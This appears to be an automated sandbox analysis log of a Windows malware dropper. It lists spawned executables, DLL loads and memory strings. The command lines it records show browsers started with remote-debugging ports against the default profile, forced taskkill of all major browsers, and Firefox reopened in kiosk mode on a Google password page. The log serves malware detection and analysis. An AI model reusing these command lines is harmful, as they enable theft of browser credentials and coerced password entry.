Source: 95bf820dd4.exe, 0000000E.00000003.3217892545.00000000007FD000.00000004.00000020.00020000.00000000.sdmp, ccdb824191.exe, 0000000F.00000003.3062307990.0000000005908000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 0000000F.00000003.3062887576.00000000058ED000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 00000013.00000003.3216325300.0000000005A66000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 00000013.00000003.3219851962.0000000005A49000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 00000017.00000003.3359856028.0000000005646000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 00000017.00000003.3412484113.0000000005650000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 00000017.00000003.3361991003.0000000005629000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: file.exe

ReversingLabs: Detection: 44%

Source: 2656cd82fe.exe

String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\file.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe "C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe"
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Process created: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe "C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe"
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Process created: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe "C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe"
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Process created: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe "C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe "C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1016042001\2656cd82fe.exe "C:\Users\user\AppData\Local\Temp\1016042001\2656cd82fe.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe "C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe "C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe"
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2396 --field-trial-handle=2356,i,7633164809811582900,3596112793272210248,262144 /prefetch:8
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe "C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe"
Source: C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1016045001\cd39094ad6.exe "C:\Users\user\AppData\Local\Temp\1016045001\cd39094ad6.exe"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2564 --field-trial-handle=2532,i,6020324080176508680,18240390168964363109,262144 /prefetch:8
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe "C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe "C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe"
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1016045001\cd39094ad6.exe "C:\Users\user\AppData\Local\Temp\1016045001\cd39094ad6.exe"
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: unknown	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1016047001\7ea0decd34.exe "C:\Users\user\AppData\Local\Temp\1016047001\7ea0decd34.exe"
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2176 -parentBuildID 20230927232528 -prefsHandle 2096 -prefMapHandle 2088 -prefsLen 25308 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6311108f-34b2-4f01-81aa-d1551b4bf54b} 6548 "\\.\pipe\gecko-crash-server-pipe.6548" 269cc26bf10 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4136 -parentBuildID 20230927232528 -prefsHandle 4120 -prefMapHandle 3988 -prefsLen 26338 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8e098c10-026b-4d67-9a0e-8d34b4933270} 6548 "\\.\pipe\gecko-crash-server-pipe.6548" 269dd097210 rdd
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe "C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe"
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1016047001\7ea0decd34.exe "C:\Users\user\AppData\Local\Temp\1016047001\7ea0decd34.exe"
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Process created: C:\Users\user\AppData\Local\Temp\8AU3DSUR7PD5E72PABBP65.exe "C:\Users\user\AppData\Local\Temp\8AU3DSUR7PD5E72PABBP65.exe"
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Process created: C:\Users\user\AppData\Local\Temp\IUIANUOB2PLSS94RMQY0EED.exe "C:\Users\user\AppData\Local\Temp\IUIANUOB2PLSS94RMQY0EED.exe"
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Process created: C:\Users\user\AppData\Local\Temp\2604211P32LZMQXV6M.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe "C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe "C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1016042001\2656cd82fe.exe "C:\Users\user\AppData\Local\Temp\1016042001\2656cd82fe.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe "C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe "C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1016045001\cd39094ad6.exe "C:\Users\user\AppData\Local\Temp\1016045001\cd39094ad6.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe "C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1016047001\7ea0decd34.exe "C:\Users\user\AppData\Local\Temp\1016047001\7ea0decd34.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Process created: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe "C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Process created: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe "C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Process created: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe "C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Process created: C:\Users\user\AppData\Local\Temp\8AU3DSUR7PD5E72PABBP65.exe "C:\Users\user\AppData\Local\Temp\8AU3DSUR7PD5E72PABBP65.exe"
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Process created: C:\Users\user\AppData\Local\Temp\IUIANUOB2PLSS94RMQY0EED.exe "C:\Users\user\AppData\Local\Temp\IUIANUOB2PLSS94RMQY0EED.exe"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2396 --field-trial-handle=2356,i,7633164809811582900,3596112793272210248,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Process created: C:\Users\user\AppData\Local\Temp\2604211P32LZMQXV6M.exe
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2564 --field-trial-handle=2532,i,6020324080176508680,18240390168964363109,262144 /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2176 -parentBuildID 20230927232528 -prefsHandle 2096 -prefMapHandle 2088 -prefsLen 25308 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6311108f-34b2-4f01-81aa-d1551b4bf54b} 6548 "\\.\pipe\gecko-crash-server-pipe.6548" 269cc26bf10 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4136 -parentBuildID 20230927232528 -prefsHandle 4120 -prefMapHandle 3988 -prefsLen 26338 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8e098c10-026b-4d67-9a0e-8d34b4933270} 6548 "\\.\pipe\gecko-crash-server-pipe.6548" 269dd097210 rdd
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
